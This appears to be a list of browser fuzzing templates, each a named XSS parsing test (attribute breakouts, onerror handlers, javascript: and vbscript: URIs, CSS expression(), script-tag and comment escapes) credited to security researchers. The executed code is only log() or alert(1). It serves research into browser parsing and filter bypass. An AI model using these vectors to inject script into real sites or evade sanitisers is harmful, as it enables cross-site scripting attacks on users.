Characters between rgb <div id="fuzzelement*num*" style="color:r*chr*gb(0,0,0);"></div> @garethheyes
Characters before rgb <div id="fuzzelement*num*" style="color:*chr*rgb(0,0,0);"></div> @garethheyes
Characters allowed before paren <div id="fuzzelement*num*" style="color:rgb*chr*(0,0,0);"></div> @garethheyes
Characters allowed after paren rule <div id="fuzzelement*num*" style="color:rgb(0,0,0)*chr*junk;"></div> @garethheyes
Valid characters after expression 4 <div style="xss:expression(logChr(*num*))\*hex2* junk"></div> @garethheyes
Valid characters after expression 3 <div style="xss:expression(logChr(*num*))'*chr*junk"></div> @garethheyes
Valid characters after expression 2 <div style="xss:expression(logChr(*num*))*chr**chr*junk"></div> @garethheyes
Valid characters after expression <div style="xss:expression(logChr(*num*))*chr*junk"></div> @garethheyes
Opening paren expression check <div style="xss:expression(logChr*chr**num*))">test</div> @garethheyes
Characters that trigger a new attr after new line <img src=1 title= x:xx*chr*/onerror=logChr(*num*)> @garethheyes
Characters eating backslash in javascript string 2 <script>if("x\*chr*".length==2) { log(*num*);}</script> @mhswende
Characters eating backslash in javascript string <script>if("x\*chr*".length==1) { log(*num*);}</script> @mhswende
Quoteless attributes breaker <img src=xxx:xxx title=1*chr*/onerror=logChr(*num*)> @garethheyes
Characters ignored inside javascript string v2 <script>if("x*chr*x" == "xx") { log(*num*);}</script> @mhswende
Characters ignored in html event handler name <img src=x on*chr*Error="javascript:log(*num*)"/> @mhswende
Characters ignored in Javascript function call "`'><script>lo*chr*g(*num*)</script> @mhswende
Replacement for greater than sign *chr*script>log(*num*)</script> @mhswende
Characters allowed between tag and attribute <script*chr*type="text/javascript">log(*num*);</script> @0xAli
Characters which break attributes without quotes <b id="id*num*" x=begin*chr*end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id*num*').getAttribute('x'))) { log(*num*);}</script> @shafigullin
Single quote break <script charset='*chr*>log(*num*)</script> @0xAli
Characters that close a quote <script charset="*chr*>log(*num*)</script> @0xAli
Uncode sequences generating illegitimate ASCII <script> "\ud83d\u*hex4*".match(/.*<.*/) ? log(*num*) : null; </script> @0x6D6172696F
Characters allowed after ampersand in named character references <a href="javascript&*chr*colon;log(*num*)" id="fuzzelement*num*">test</a> @_cweb
Characters ending HTML closing tags (HTML4) <style></style*chr*<img src="about:blank" onerror=log(*num*)//></style> @0x6D6172696F
Characters consuming backslashes and breaking JS strings <script>a='abc\*chr*\';log(*num*)//def';</script> @0x6D6172696F
Events in tags with src or href that execute javascript <*datahtmlelements* data=about:blank background=about:blank action=about:blank type=image/gif src=about:blank href=about:blank *dataevents*="customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> @garethheyes
Tags and events that execute javascript 2 <*datahtmlelements* *dataevents*="javascript:parent.customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> @garethheyes
Tags and events that execute javascript <*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')"></*datahtmlelements*> @garethheyes
Tags that execute onerror <*datahtmlelements* src=1 href=1 onerror="customLog('*datahtmlelements*')"></*datahtmlelements*> @garethheyes
Does this browser support e4x <script>try{eval("<></>");logBoolean(1)}catch(e){logBoolean(0)};</script> @garethheyes
Characters to separate class names in class attributes <div class="foo*num**chr*bar">HELLO</div> <script>document.getElementsByClassName('foo*num*')[0]?log(*num*):0</script> @0x6D6172696F
Characters allowed after uri host "`'/><img/onload=log(*num*) src="http://shazzer.co.uk*chr*/favicon.ico"/> @jackmasa
Determine what character can replace in end tags <script>log(*num*)<*chr*script> @MisterJyu
Characters that close a HTML comment 002 <!--*chr*<img src=xxx:x onerror=log(*num*)> --> @0x6D6172696F
Characters that close HTML tags <script>log(*num*)</script*chr* @0x6D6172696F
Characters not encoded by encodeURIComponent <script> if ('*uni*' === encodeURIComponent('*uni*')) { log(*num*); } </script> @shafigullin
Characters not encoded by encodeURI <script> if ('*uni*' === encodeURI('*uni*')) { log(*num*); } </script> @shafigullin
Characters allowed after script <script*chr*>log(*num*)</script> @garethheyes
Single character breaking innerHTML copy <div id="fuzzelement*num*"> <div title="*chr*style=color:#FF1133;" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Entity character breaking innerHTML copy <div id="fuzzelement*num*"> <div title="&#x*hex6*;style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
determine what characters can be inside a script tag "`'><sc*chr*ript>log(*num*)</sc*chr*ript> @MisterJyu
Characters allowed attribute quote "/><img/onerror=*chr*log(*num*)*chr*src=xxx:x /> @jackmasa
determine any chars can go between the onerror attributes <img src="x"*chr**chr*o*chr*n*chr*error="alert(*num*)"> @MisterJyu
Replacement for greater and less than signs (revised) *chr*script*chr* log(*num*) *chr**chr*script*chr @MisterJyu
Replacement for greater and less than signs *chr*script*chr alert(1) *chr**chr*script*chr @MisterJyu
Characters syntactically equivalent to single quote in HTML attributes `"'><img src='#*chr* onerror=log(*num*)> @_cweb
Characters syntactically equivalent to colon in a URI <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> @_cweb
Characters breaking innerHTML copy <div id="fuzzelement*num*"> <div title="*chr**chr*style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Characters escaping JS comment delimiters 001 <script>/* **chr*/log(*num*)// */</script> @0x6D6172696F
Characters breaking CSS strings allowing expression "'`>ABC<div style="font-family:'foo*chr*;x:expression(log(*num*));/*';">DEF @0x6D6172696F
Characters ending CSS values allowing expressions "'`>ABC<div style="font-family:'foo'*chr*x:expression(log(*num*));/*';">DEF @0x6D6172696F
Characters breaking JavaScript Regex delimiter "'`><script>a=/hello;*chr*;i=0;log(*num*);a/i;</script> @0x6D6172696F
Escape from attribute a closing tag <a href="*chr*><script>log(*num*)</script>" /> @shafigullin
Characters in script inside XML elements 004 "'`><p><svg><script>a='hello*chr*;log(*num*)//';</script></p> @0x6D6172696F
Characters in script inside XML elements 003 <p><svg><script>*chr*og(*num*)</script></p> @0x6D6172696F
Characters in script inside XML elements 002 <p><svg><script>l*chr*og(*num*)</script></p> @0x6D6172696F
Characters in script inside XML elements 001 <p><svg><script>*chr*log(*num*)</script></p> @0x6D6172696F
Space characters in RegExp <script> if ('*chr*'.replace(/\s/g, '') === '') { log(*num*); } </script> @shafigullin
Character between lt and slash in closing tag <script>log(*num*)<*chr*/script> @shafigullin
Characters allowed for padding in a VBS URI 002 <iframe src="vbscript:log*chr**num*"></iframe> @0x6D6172696F
Characters allowed for padding in a VBS URI 001 <iframe src="vbs:log*chr**num*"></iframe> @0x6D6172696F
Characters allowed between CSS expression chars 02 ABC<div style="x:expression*chr*(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS expression chars 01 ABC<div style="x:exp*chr*ression(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS colon and expression ABC<div style="x:*chr*expression(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS prop and expression ABC<div style="x*chr*expression(log(*num*))">DEF @0x6D6172696F
Characters allowed for padding in a data URI 003 <script src="data:text/plain*chr*log(*num*)"></script> @0x6D6172696F
Characters allowed for padding in a data URI 002 <script src="data:*chr*,log(*num*)"></script> @0x6D6172696F
Characters allowed for padding in a data URI 001 <script src="data:text/plain,lo*chr*g(*num*)"></script> @0x6D6172696F
Characters trimmed my trim <script> if ('*chr*'.trim() === '') { log(*num*); } </script> @shafigullin
Characters before paren in Javascript call "'`><script>log*chr*(*num*)</script> @garethheyes
Characters before img "'`><*chr*img src=xxx:x onerror=log(*num*)> @garethheyes
Characters before script '`"><*chr*script>log(*num*)</script> @garethheyes
Characters in between protocol in js url <a href="javas*chr*cript:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed after attribute name `"'><img src=xxx:x onerror*chr*=log(*num*)> @garethheyes
Characters that close JS Comments '"`><script>/* **chr*log(*num*)// */</script> @garethheyes
Characters allowed before protocol in js url <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed before colon in js url <a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
NULL Characters inside JavaScript properties `'"><script>window['log*chr*'](*num*)</script> @garethheyes
Characters allowed before CSS properties '"`><div id="fuzzelement*num*" style="*chr*color:#000000;"></div> @garethheyes
Characters allowed before a JavaScript function "`'><script>*chr*log(*num*)</script> @garethheyes
Characters that close a HTML comment --><!-- --*chr*> <img src=xxx:x onerror=log(*num*)> --> @garethheyes
Characters allowed before attribute name `"'><img src=xxx:x *chr*onerror=log(*num*)> @garethheyes